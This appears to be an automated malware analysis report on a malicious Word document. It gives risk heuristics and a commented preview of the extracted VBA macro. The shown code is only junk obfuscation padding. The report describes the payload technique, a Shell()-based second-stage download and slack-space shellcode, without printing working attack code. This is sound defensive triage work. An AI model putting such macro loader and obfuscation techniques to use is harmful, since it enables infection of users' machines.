MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an OLE document containing a VBA macro that utilizes the Shell() function, a strong indicator of malicious intent. The macro appears to be obfuscated with complex string manipulations and loops, suggesting it's designed to download and execute a second-stage payload. The presence of the Document_Open macro further supports this, as it's commonly used to trigger malicious actions upon document opening.
Heuristics 5
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
OLE document has large unaccounted-for region — high — OLE_SLACK_ANOMALY: OLE file is 121,344 bytes but its declared streams total only 61,105 bytes — 60,239 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27981 bytes |

SHA-256: f5831995232b3e8f8a35712c05428ba19904a457f082416f18076c4ebde73d76
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' RHqPsn: obfuscation padding with no observable effect.
' Every statement in this procedure assigns the result of a built-in string
' helper (LTrim/RTrim/Left/Right/UCase/Space/StrReverse or "+" concatenation of
' literals) or a constant arithmetic expression to a name that is never read
' afterwards; the loops only advance their own counters. The Integer parameter
' HKEubD is never referenced, and nothing here calls Shell(), CreateObject or
' any other routine with side effects. This is the "complex string
' manipulations and loops" the report summary refers to; the Shell() and
' Document_Open behaviour flagged by the heuristics lives elsewhere in
' macros.bas (the listing is truncated below).
' No Option Explicit precedes this procedure in the listing, so the assigned
' names are implicitly declared Variants — the same name receives both String
' and numeric results (e.g. tGvuUxJ at the first two assignments) — and are
' presumably procedure-local; confirm against the full module once the
' truncated remainder is available.
' Triage note: the dead-store-plus-busy-loop pattern, the decoy string
' literals and the fixed loop bounds (139 / 330 / 195 / 46 / 25) are
' themselves a usable static indicator of generated junk code.
Private Sub RHqPsn(HKEubD As Integer)
' Counted loop: body never reads XJBvLH; each iteration recomputes the same
' discarded values.
For XJBvLH = 0 To 139
tGvuUxJ = LTrim("*_fM$FRA$qit%OQd")
gvGBb = Right("kyeHbrpAA^.YEyky", 5)
mDUmeu = 1162 - 785 - 1554
nLcfAUtT = 1782 + 1246 + 134
fQhIMqD = 568 - 1005 - 483
' tGvuUxJ is overwritten with a number after holding a String above — only
' possible because the name is an untyped Variant.
tGvuUxJ = 672 + 574 + 552
Next XJBvLH
XJodD = Right("B.GvXI$GIud", 4)
fQhIMqD = LTrim("kdEOcBcSWg.NF")
' ZQctlm is never initialised (Empty, compares as 0); the loop runs until the
' counter reaches 330, stepping by 1.
While ZQctlm < 330
mDUmeu = StrReverse("C )y-YFp$EJ)BK")
nLcfAUtT = LTrim("gb#)OoX_SVbm%W_")
nLcfAUtT = 354 + 1535 + 1816
nLcfAUtT = Right("ZqTsIERt_@vJz$", 3)
QJlnFad = Space(3)
QJlnFad = UCase("rorx%D(e_]c]zMvA?oUB")
FEUwfn = UCase("WzVmQZ#dXE")
nLcfAUtT = 1655 + 1815 + 1523
ZQctlm = ZQctlm + 1
Wend
' Same shape as above, stepping zQRGEi by 3 up to 195.
While zQRGEi < 195
gvGBb = RTrim("ifranqwx*SnMYq")
XJodD = RTrim("Oq])eXsM-w")
gvGBb = "CYA_yRYdgEgE" + "jkUB&)[V_G" + "^TfVTkaryg"
zQRGEi = zQRGEi + 3
Wend
fQhIMqD = StrReverse("uEx[YEX*L]QR")
FEUwfn = StrReverse("GXaKA?qeFscT")
' Counted loop: body never reads WfxjzP.
For WfxjzP = 0 To 46
XJodD = Space(14)
tGvuUxJ = Right("Am)Jgfsxy#u_^[hpYNtc", 2)
FEUwfn = Left("XCBnbmT!u$$!Gka]K$!", 3)
gvGBb = LTrim("r bBSCwNuvj(eqBCX")
FEUwfn = 331 + 168 + 113
QJlnFad = Space(2)
QJlnFad = StrReverse("Jjg!AflZQo-Q!W)^")
nLcfAUtT = LTrim("P(ukm_o@DDZBwMhFxig")
fQhIMqD = Right("^@YDpu^JRudnPwYk% ", 4)
Next WfxjzP
' Straight-line dead stores; each value is replaced or dropped before the
' procedure ends.
XJodD = 759 + 1394 + 1879
nLcfAUtT = Right("@@]y]%DdfbTSem-hlU", 4)
nLcfAUtT = LTrim("t!?).%b#nGsm")
fQhIMqD = StrReverse("Y(H-lglpI.z-MkT^S%T")
XJodD = StrReverse("F*verYXiQT^D]VS[")
fQhIMqD = UCase("-yAZ%%aKnfrlg$uY")
nLcfAUtT = 1607 + 1642 + 1621
gvGBb = 1659 + 1631 + 305
FEUwfn = StrReverse("kMznokQhDy")
FEUwfn = LTrim("_pVaxrrEbzg%)b")
FEUwfn = LTrim("mzhaCWMSw!j]")
tGvuUxJ = StrReverse("R[FGXO)mH-vr)ws.")
gvGBb = Right("aPE?GPfJ[YY", 2)
gvGBb = Right("HpWWEmt^mu", 5)
gvGBb = UCase("esswFq[Qo%M.D")
mDUmeu = UCase("BoLJWsxhY]")
mDUmeu = StrReverse("]Nq_rKj@mu$yCt")
FEUwfn = Space(11)
FEUwfn = Right("-.Y[beJ%]Co!%xWv", 2)
tGvuUxJ = "DeCRxb-!njXr&O" + "_HIjhP?FhPC" + "CcEp&qKpymN"
XJodD = Left("TOFZ_)EKhbOWQ", 5)
' Counted loop: body never reads VIjTqp.
For VIjTqp = 0 To 25
gvGBb = LTrim("K%ZNAS!phhp?n%@nNR")
fQhIMqD = 1049 + 1610 + 519
fQhIMqD = Right("KfyT*HGE]ofG", 3)
QJlnFad = 1899 - 942 - 1417
XJodD = 1785 - 1609 - 1728
nLcfAUtT = RTrim("^uKqFcuo#I&")
tGvuUxJ = "lBLMpKHp(UvNBQS(u@f" + "AKisK*Tuc&qAsSsL!" + "#jeS#?wxM.t"
Next VIjTqp
End Sub
Private Function jOmAKP(CpEsVN As Integer, huvgzgP As Boolean, ahcDkAc As String, DAIgHSs As String) As String
nLcfAUtT = RTrim("opvvRZdTJJO^t_OXx")
mDUmeu = 240 - 234 - 1230
QJlnFad = "JkljA(aKUD?a" + "xI%d& baSTV vnbl" + "RQGget-eY*c!g"
QJlnFad = "CIhiFVf@qtBLt" + "$_i.cgW($cEzjSP" + "LUjyiPBUKSR"
XJodD = RTrim("g!MN!fdFlyQguaPB(kNp")
While ImkwzW < 352
FEUwfn = 1105 + 1086 + 1316
FEUwfn = Left("?$l)FH.P$K]zA.ckm", 3)
mDUmeu = Right("JXuJW&a-$Pp", 3)
ImkwzW = ImkwzW + 1
Wend
While UIPelX < 298
tGvuUxJ = LTrim(")KqWSpu!ynTIH-iA")
mDUmeu = "(OzX)oxoTV!AiHY?hlks" + "EqpfMxONRa " + "sfeXwOG- $T%ovUbu)"
XJodD = StrReverse("PAtaSt^@rhVZ#!z]IYa")
gvGBb = 1785 + 1951 + 902
QJlnFad = 1922 - 686 - 803
XJodD = 1257 - 1403 - 600
tGvuUxJ = Right("(&Oz$ij]VLG&nQhRP-", 4)
FEUwfn = RTrim("LyI!lYQjN&pUm)")
FEUwfn = LTrim("k*leXAv#ZwfDPl")
QJlnFad = "?sFM nzzMo" + "pNFfeW!LX?Z_xcCQ" + "hnXw(-wzzMUcFv!GQ"
UIPelX = UIPelX + 3
... (truncated)
|
|||